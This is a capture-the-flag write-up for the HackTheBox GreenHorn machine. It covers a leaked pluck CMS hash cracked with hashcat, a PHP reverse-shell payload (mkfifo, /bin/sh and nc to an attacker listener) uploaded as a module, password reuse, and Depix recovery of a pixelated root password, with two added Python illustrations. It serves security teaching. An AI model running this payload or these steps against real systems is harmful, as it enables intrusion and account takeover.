Summary

This is a technical write-up for the GreenHorn Linux machine on HackTheBox. User access was obtained by cracking the pluck CMS administrator's password hash, which was exposed in a publicly readable Gitea repository, and using the recovered password to upload a malicious module to the web application; the same password was reused by a local user account. Root access was achieved by de-pixelating a pixelated password screenshot found in a PDF in that user's home directory.

Reconnaissance

Basic Scans

First, nmap scans were performed for the full TCP port range and the top 200 UDP ports:

nmap -v -T4 -Pn -A -oA nmap_full_tcp -p 1-65535 10.10.11.25
nmap -v -T4 -Pn -sU --top-ports 200 10.10.11.25

The output revealed three TCP services listening on the target host:

Nmap scan report for greenhorn.htb (10.10.11.25)
Host is up (0.048s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-generator: pluck 4.7.18
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
|_http-trane-info: Problem with XML parsing of /evox/about
|_https-redirect: ERROR: Script execution failed (use -d to debug)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=2d720d12bb47d9bd; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=YI0TZ56Fqhg8gWXt5Fov7fu7RJU6MTcyMjA3NTAxNjUwMjk3OTkzOQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:10:16 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=778d563740427839; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=1-58iSr-RhBQcPFbzZmPumPjbow6MTcyMjA3NTAyMTc5MzE2ODI3OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:10:21 GMT
|_    Content-Length: 0

Service Identification

22/tcp

Port 22/tcp was an OpenSSH service. It becomes useful once credentials are obtained elsewhere on the box, or once a public key can be added to a user's authorized_keys file; at this point nothing could be done with it.

80/tcp

Port 80/tcp was an instance of pluck CMS; the http-generator header reported by nmap gives the version as 4.7.18. This version has a known authenticated exploit (arbitrary file upload through the module installer), but it requires the admin password.

3000/tcp

Port 3000/tcp was a Gitea instance with anonymous read access to the GreenAdmin user's GreenHorn repository, which is the codebase of the pluck CMS instance running on port 80.

Foothold

The source code in Gitea revealed the authentication mechanism: the admin password is stored as a hardcoded hash in data/settings/pass.php (http://greenhorn.htb:3000/GreenAdmin/GreenHorn/src/branch/main/data/settings/pass.php), a file that should never have been committed to a repository, let alone a publicly readable one:

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

The digest was saved to admin_pass.hash and run through hashid. hashid cannot distinguish between algorithms with the same output size: for a 128-character hex string it lists every 512-bit candidate, of which SHA-512 is the most likely for a PHP application. Reading the login handler in the same repository is the reliable way to confirm which function is used rather than guessing:

hashid admin_pass.hash
--File 'admin_pass.hash'--
Analyzing 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163'
[+] SHA-512
[+] Whirlpool
[+] Salsa10
[+] Salsa20
[+] SHA3-512
[+] Skein-512
[+] Skein-1024(512)
--End of file 'admin_pass.hash'--

Cracking it with hashcat in mode 1700 (raw, unsalted SHA-512) against rockyou.txt recovered the admin password almost instantly: iloveyou1. A hit in mode 1700 also settles the algorithm question, since the digest matched raw SHA-512 and not one of the other candidates.

hashcat -a 0 -m 1700 admin_pass.hash ~/HTB/wordlists/rockyou.txt
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1700 (SHA2-512)
Hash.Target......: d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe...790163
Time.Started.....: Sat Jul 27 12:26:26 2024 (0 secs)
Time.Estimated...: Sat Jul 27 12:26:26 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/m4rt/HTB/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4328.0 kH/s (0.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> iheartyou
Hardware.Mon.#1..: Temp: 66c Util: 21%
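As an added example (not part of the original write-up), the following Python script resolves the ambiguity hashid leaves open by trying each unsalted 512-bit algorithm available in hashlib against a small constructed wordlist standing in for rockyou.txt. The digest is the one from pass.php above; the wordlist is made up for the example. Whirlpool and Skein are not in hashlib and would need an extra library.

```python
"""Confirm which 512-bit hash function produced a digest by trying the
candidates hashlib offers over a wordlist. hashid only lists every
algorithm with a 128-hex-character output; this resolves the ambiguity."""
import hashlib

# Digest from data/settings/pass.php in the GreenHorn repository.
ADMIN_HASH = ("d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d77"
              "0486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163")

# Constructed mini-wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "iloveyou", "iloveyou1", "greenhorn"]

# Unsalted 512-bit digests hashlib can compute; name -> hex digest function.
CANDIDATES = {
    "sha512": lambda b: hashlib.sha512(b).hexdigest(),
    "sha3_512": lambda b: hashlib.sha3_512(b).hexdigest(),
    "blake2b": lambda b: hashlib.blake2b(b).hexdigest(),
}


def identify_by_length(hash_hex):
    """Sanity check before cracking: a 128-hex-char string is a 512-bit digest.
    Returns the digest size in bits or raises if the input is not hex."""
    hash_hex = hash_hex.strip().lower()
    if len(hash_hex) != 128 or any(c not in "0123456789abcdef" for c in hash_hex):
        raise ValueError("not a 128-character hex digest")
    return 512


def crack(hash_hex, wordlist, candidates=CANDIDATES):
    """Return (algorithm, password) for the first candidate/word pair whose
    digest equals hash_hex, or None if nothing in the wordlist matches.
    Trying every algorithm per word tells you which one the app used."""
    target = hash_hex.strip().lower()
    for word in wordlist:
        data = word.encode()
        for name, fn in candidates.items():
            if fn(data) == target:
                return name, word
    return None


if __name__ == "__main__":
    identify_by_length(ADMIN_HASH)
    print(crack(ADMIN_HASH, WORDLIST))  # ('sha512', 'iloveyou1')
```

The result matches hashcat's mode 1700 hit: the CMS stores a single unsalted SHA-512 of the password, so any leaked copy of pass.php is crackable offline at full GPU speed.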

User Access

With the admin password for pluck CMS, we can log in at http://greenhorn.htb/login.php.

To use the known exploit for pluck CMS (the module installer accepts a ZIP archive and extracts it without checking its contents), we create a PHP file containing a reverse shell:

<?php
// Reverse shell back to the attacker's listener (10.10.14.8:1234).
// A named pipe feeds the interactive shell's input; its output goes
// over the nc connection.
exec("rm /tmp/fafa;mkfifo /tmp/fafa;cat /tmp/fafa|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/fafa");
?>

and ZIP it before uploading:

┌──(kali㉿kali)-[~/HTB/10.10.11.25]
└─$ zip -r revshell.zip revshell.php

The ZIP file can then be uploaded under Options / Manage Modules / Install a module. pluck extracts the archive into its data/modules/ directory, so the shell is triggered by requesting the extracted revshell.php from there over HTTP. Before uploading, a reverse shell listener must be set up:

┌──(kali㉿kali)-[~/HTB/10.10.11.25]
└─$ nc -nlvp 1234

Once the reverse shell is established, we have an unprivileged shell as www-data. The /home directory contains two users: git and junior. The cracked password iloveyou1 was reused by the junior user, so it can be used to switch accounts. Note that su refuses to run without a terminal, so the nc shell first has to be upgraded to a PTY (for example with python3 -c 'import pty; pty.spawn("/bin/bash")'):

su junior

Privilege Escalation

The home directory of user junior contains a PDF file called Using OpenVAS.pdf. After downloading it, we can see that it contains a screenshot in which a password has been pixelated. Pixelation with a box filter is reversible when the attacker can reproduce the original rendering: the image is extracted from the PDF (for example with pdfimages from poppler-utils) and fed to the Depix tool together with a search image rendered with the same font and editor settings; here the Windows 10 Notepad De Bruijn sequence shipped with Depix matched. The recovered string sidefromsidetheothersidesidefromsidetheotherside is the root password (su root).

┌──(kali㉿kali)-[~/HTB/10.10.11.25]
└─$ python3 depix.py -p ../password_pix.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o ../password_depix.png
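To show why Depix works, and why the search image has to be rendered the same way as the victim screenshot, here is an added, self-contained Python model of the technique. It is not Depix's code. The bitmap "font" is generated from a seeded PRNG and stands in for a real font rendering; the pixelation grid is assumed to align with glyph boundaries, which Depix does not require (its De Bruijn search image also contains blocks that straddle two characters). Everything else is the same idea: box-filter pixelation averages each block, the attacker pixelates known text identically and indexes the block values, and the victim's blocks are looked up in that index.

```python
"""Toy model of pixelation reversal: a box (average) filter leaves each
glyph with a signature of block values that can be looked up if the
attacker can render the same characters with the same font and block size.
The toy font below is a seeded-PRNG bitmap standing in for a real font."""
import random
from collections import defaultdict

GLYPH_W, GLYPH_H = 6, 8          # toy glyph size in pixels
BLOCK = 2                        # pixelation block size (divides glyph size)
ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def make_toy_font(seed=1337):
    """One binary GLYPH_H x GLYPH_W bitmap per character. Deterministic, so
    'victim' and 'attacker' renderings are identical for the same seed."""
    rng = random.Random(seed)
    return {ch: [[255 if rng.random() < 0.45 else 0 for _ in range(GLYPH_W)]
                 for _ in range(GLYPH_H)] for ch in ALPHABET}


def render(text, font):
    """Render text as a GLYPH_H x (len(text) * GLYPH_W) grayscale grid."""
    return [[v for ch in text for v in font[ch][y]] for y in range(GLYPH_H)]


def pixelate(img, block=BLOCK):
    """Box-filter pixelation: every block x block tile becomes its integer
    mean, exactly what an image editor's 'pixelate' effect does."""
    h, w = len(img), len(img[0])
    out = []
    for by in range(0, h, block):
        row = []
        for bx in range(0, w, block):
            tile = [img[y][x] for y in range(by, by + block)
                    for x in range(bx, bx + block)]
            row.append(sum(tile) // len(tile))
        out.append(row)
    return out


def glyph_signature(pix, col):
    """Tuple of block values covering glyph number `col` of a pixelated image."""
    bpg = GLYPH_W // BLOCK       # blocks per glyph horizontally
    return tuple(v for row in pix for v in row[col * bpg:(col + 1) * bpg])


def build_reference(font):
    """Attacker side: render every character, pixelate it the same way and
    index the block signatures. A signature may map to several characters."""
    ref = pixelate(render(ALPHABET, font))
    table = defaultdict(list)
    for i, ch in enumerate(ALPHABET):
        table[glyph_signature(ref, i)].append(ch)
    return table


def depixelate(pix, table):
    """Recover text from pixelated blocks by signature lookup. A block group
    matching no character or more than one is reported as '?'."""
    n_glyphs = len(pix[0]) // (GLYPH_W // BLOCK)
    out = []
    for i in range(n_glyphs):
        matches = table.get(glyph_signature(pix, i), [])
        out.append(matches[0] if len(matches) == 1 else "?")
    return "".join(out)


def demo(secret="sidefromside"):
    """Victim pixelates `secret`; the attacker, who never sees the plaintext,
    recovers it from the pixelated blocks alone."""
    font = make_toy_font()
    leaked = pixelate(render(secret, font))      # all the attacker gets
    return depixelate(leaked, build_reference(font))


def demo_wrong_font(secret="side"):
    """Failure mode: a reference rendered with a different font (different
    seed) shares no signatures with the victim image, so nothing is recovered.
    This is why Depix needs a search image from the same editor and font."""
    leaked = pixelate(render(secret, make_toy_font(seed=1)))
    return depixelate(leaked, build_reference(make_toy_font(seed=2)))


if __name__ == "__main__":
    print(demo(), demo_wrong_font())
```

The lesson for the defender is the same as Depix's: pixelation is an averaging operation, not a one-way one, so a secret in a screenshot must be covered with a solid block, not blurred or pixelated.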